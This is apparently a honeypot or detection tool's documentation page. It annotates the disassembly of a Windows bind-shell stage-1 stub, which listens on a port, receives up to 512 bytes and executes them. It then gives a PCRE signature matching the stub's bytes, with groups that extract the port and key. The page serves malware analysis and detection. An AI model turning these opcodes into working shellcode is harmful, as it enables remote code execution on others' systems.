
ShellcodeHandler Generic LinkBindTrans

Vulnerability

Description

Reference

Analysis

Annotated disassembly of the stage-1 bind stub. Before every `call esi` a constant is loaded into edx, so esi presumably points to a hash-based Win32 API resolver set up before this excerpt (edx = API hash). The stub binds a listening socket, accepts one client, receives up to 0x200 bytes into the buffer at ebp and jumps to it without any check; the `(..)` and `(....)` groups of the pattern below recover the listening port and the key from the bytes.

      /*
                00402111   ba 83538300      mov edx,835383                           ; edx = API hash (same calling scheme for every call esi below)
                00402116   ffd6             call esi                                 ; socket() -- esi presumably resolves edx to the API and calls it
                00402118   53               push ebx                                 ; build sockaddr_in (16 bytes) on the stack, last field first:
                00402119   53               push ebx                                 ;   sin_zero (8 bytes) and sin_addr -- ebx is presumably 0 here
                0040211a   53               push ebx                                 ;   (set before this excerpt), i.e. sin_addr = INADDR_ANY
                0040211b   68 0200d63a      push 3ad60002                            ; sin_family = 2 (AF_INET); sin_port bytes d6 3a = port 0xd63a (54842) in network order -> pattern group 1 (..)
                00402120   8bd4             mov edx,esp
                00402122   8bd8             mov ebx,eax
                00402124   6a 10            push 10
                00402126   52               push edx
                00402127   53               push ebx
                00402128   ba 0090a6c2      mov edx,c2a69000
                0040212d   ffd6             call esi                                 ; bind()
                0040212f   40               inc eax                                  ; bind() returns 0 on success -> backlog = 1; no error check (SOCKET_ERROR, -1, would give backlog 0)
                00402130   50               push eax
                00402131   53               push ebx
                00402132   ba 7a3b73a1      mov edx,a1733b7a
                00402137   ffd6             call esi                                 ; listen()
                00402139   50               push eax                                 ; eax == 0 after a successful listen(): reused as NULL addrlen
                0040213a   50               push eax                                 ; NULL addr
                0040213b   53               push ebx
                0040213c   ba 10d36900      mov edx,69d310
                00402141   ffd6             call esi                                 ; accept()
                00402143   8bd8             mov ebx,eax                              ; ebx = accepted client socket (the listening socket handle is overwritten and never closed)
                00402145   33c0             xor eax,eax                              ; eax = 0
                00402147   50               push eax                                 ; flags = 0
                00402148   b4 02            mov ah,2                                 ; eax = 0x200: receive at most 512 bytes
                0040214a   50               push eax                                 ; len = 0x200
                0040214b   55               push ebp                                 ; buf = ebp (stage-2 buffer, set up before this excerpt)
                0040214c   53               push ebx                                 ; s = client socket
                0040214d   ba 005860e2      mov edx,e2605800
                00402152   ffd6             call esi                                 ; recv(client, ebp, 0x200, 0) -- byte count / SOCKET_ERROR is ignored
                00402154   bf 1cf174c0      mov edi,c074f11c                         ; authentication key, handed to stage 2 in edi -> pattern group 2 (....)
                00402159   ffe5             jmp ebp                                  ; execute whatever was received: no length or content check on the stage-2 bytes
        */

Pattern

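      /*
       * PCRE signature for the stage-1 "link" bind stub disassembled above.
       *
       * This is a C string, so every regex escape is doubled: the text handed
       * to pcre_compile() reads "\xba\x83...".  The pattern is byte-exact for
       * the stub's opcodes and API hashes (the "mov edx,<hash>" immediates),
       * with two capture groups for the variable bytes:
       *   1: (..)   the two sin_port bytes following \x68\x02\x00
       *             (network byte order -> ntohs() gives the listening port)
       *   2: (....) the 4-byte immediate of "mov edi,<key>", the key the
       *             received stage is handed in edi
       *
       * (?s) sets PCRE_DOTALL inline.  The captured bytes are arbitrary binary;
       * without DOTALL a '.' does not match 0x0a, so a port or key containing
       * a newline byte would silently fail to match unless the caller happened
       * to compile the pattern with PCRE_DOTALL.  Setting it in the pattern
       * makes the signature independent of the compile flags.
       */
      const char *pcre =
                "(?s)"
                "\\xba\\x83\\x53\\x83\\x00\\xff\\xd6\\x53\\x53\\x53\\x68\\x02\\x00"
                "(..)\\x8b\\xd4\\x8b\\xd8\\x6a\\x10\\x52\\x53\\xba\\x00\\x90"
                "\\xa6\\xc2\\xff\\xd6\\x40\\x50\\x53\\xba\\x7a\\x3b\\x73\\xa1\\xff"
                "\\xd6\\x50\\x50\\x53\\xba\\x10\\xd3\\x69\\x00\\xff\\xd6\\x8b\\xd8"
                "\\x33\\xc0\\x50\\xb4\\x02\\x50\\x55\\x53\\xba\\x00\\x58\\x60\\xe2"
                "\\xff\\xd6\\xbf(....)\\xff\\xe5";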

Dependencies

 